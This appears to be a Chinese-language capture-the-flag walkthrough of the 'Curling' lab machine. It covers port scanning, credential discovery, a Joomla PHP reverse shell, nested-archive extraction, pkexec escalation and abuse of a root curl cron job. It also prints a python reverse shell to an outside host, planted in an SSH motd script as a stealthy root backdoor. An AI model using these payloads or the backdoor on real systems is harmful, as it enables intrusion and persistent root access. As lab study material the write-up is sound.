[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升

2025-01-28 10 0

Information Gathering

IP Address Opening Ports
10.10.10.150 TCP:22,80

$ sudo masscan -p1-65535,U:1-65535 10.10.10.150 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports

$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')

$ nmap -Pn -sV -sC -p$ports 10.10.10.150

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图1

$ curl http://10.10.10.150/secret.txt

$ echo 'Q3VybGluZzIwMTgh' |base64 -d

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图2

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图3

username:Floris
password:Curling2018!

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图4

http://10.10.10.150/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图5

$ curl http://10.10.10.150/

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图6

nested compression

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图7

$ cat res | xxd -r > bak

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图8

$ binwalk bak

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图9

$ bzip2 -d bak

$ binwalk bak.out

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图10

$ mv bak.out bak.gz

$ gzip -d bak.gz

$ binwalk bak

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图11

$ bzip2 -d bak

$ binwalk bak.out

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图12

$ tar xf bak.out

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图13

username:floris

password:5d<wdCbdZu)|hChXll

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图14

User.txt

9cd31d58b2560bd53d7569921ef8e3e2

Privilege Escalation

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.13 --lport 10012 --rhost 10.10.16.13 --rport 10011 --http 1111

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图15

CURL -K Abuse

$ ./pspy32

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图16

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图17

$ while true; do
  echo -e "url = file:///root/root.txt\noutput = /tmp/root" > /home/floris/admin-area/input
  if [ -f /tmp/root ]; then
    echo "Flag:" $(cat /tmp/root)
    break
  fi
  sleep 1
done

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图18

CURL -K Abuse + sysinfo SSH Backdoor

pspy32通过ssh登录查看root用户启动了哪些应用程序

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图19

锁定/etc/update-motd.d/50-landscape-sysinfo

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图20

修改保存为50-landscape-sysinfo

#!/bin/sh
cores=$(grep -c ^processor /proc/cpuinfo 2>/dev/null)
[ "$cores" -eq "0" ] && cores=1
threshold="${cores:-1}.0"
if [ $(echo "`cut -f1 -d ' ' /proc/loadavg` < $threshold" | bc) -eq 1 ]; then
    echo
    echo -n "  System information as of "
    /bin/date
    echo
    /usr/bin/landscape-sysinfo
else
    echo
    echo " System information disabled due to load higher than $threshold"
fi
python3 -c 'import socket, os, pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.16.13",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/bash")' &

$ echo -e "url = http://10.10.16.13/50-landscape-sysinfo\noutput = /etc/update-motd.d/50-landscape-sysinfo" > /home/floris/admin-area/input

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图21

定时任务CURL触发后将下载http://10.10.16.13/50-landscape-sysinfo 到 /etc/update-motd.d/50-landscape-sysinfo

$ ssh [email protected]

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图22

任意IP通过ssh登录后,会自动反弹ROOT权限shell到指定主机。这个过程难以察觉。

[Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升插图23

Root.txt

2ba5c4cd5856f05ebf2015aa04e33dae

相关文章:

  1. [Meachines] [Easy] Academy Laravel-RCE+TRP00F权限提升+audit服务日志权限提升+composer权限提…
  2. [Meachines][Medium]Monitored
  3. [Meachines] [Easy] Devel FTP匿名访问文件上传+MS10-015权限提升
  4. [Meachines] [Insane] Jail BOF+Socket Re-Use+NFS UI…
  5. [Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

2025最新&模拟器微信小程序抓包&小程序反编译
新威胁组织GamaCopy模仿俄罗斯Gamaredon APT,针对俄语目标发起攻击
Windows_xp_win7-驱动编译与双虚拟机调试环境搭建
勒索软件利用隐秘SSH隧道攻击ESXi系统,实现C2通信
[Meachines] [Easy] GoodGames SQLI+Flask SSTI+Docker逃逸权限提升
BUUCTF-reverse wp(二)

发布评论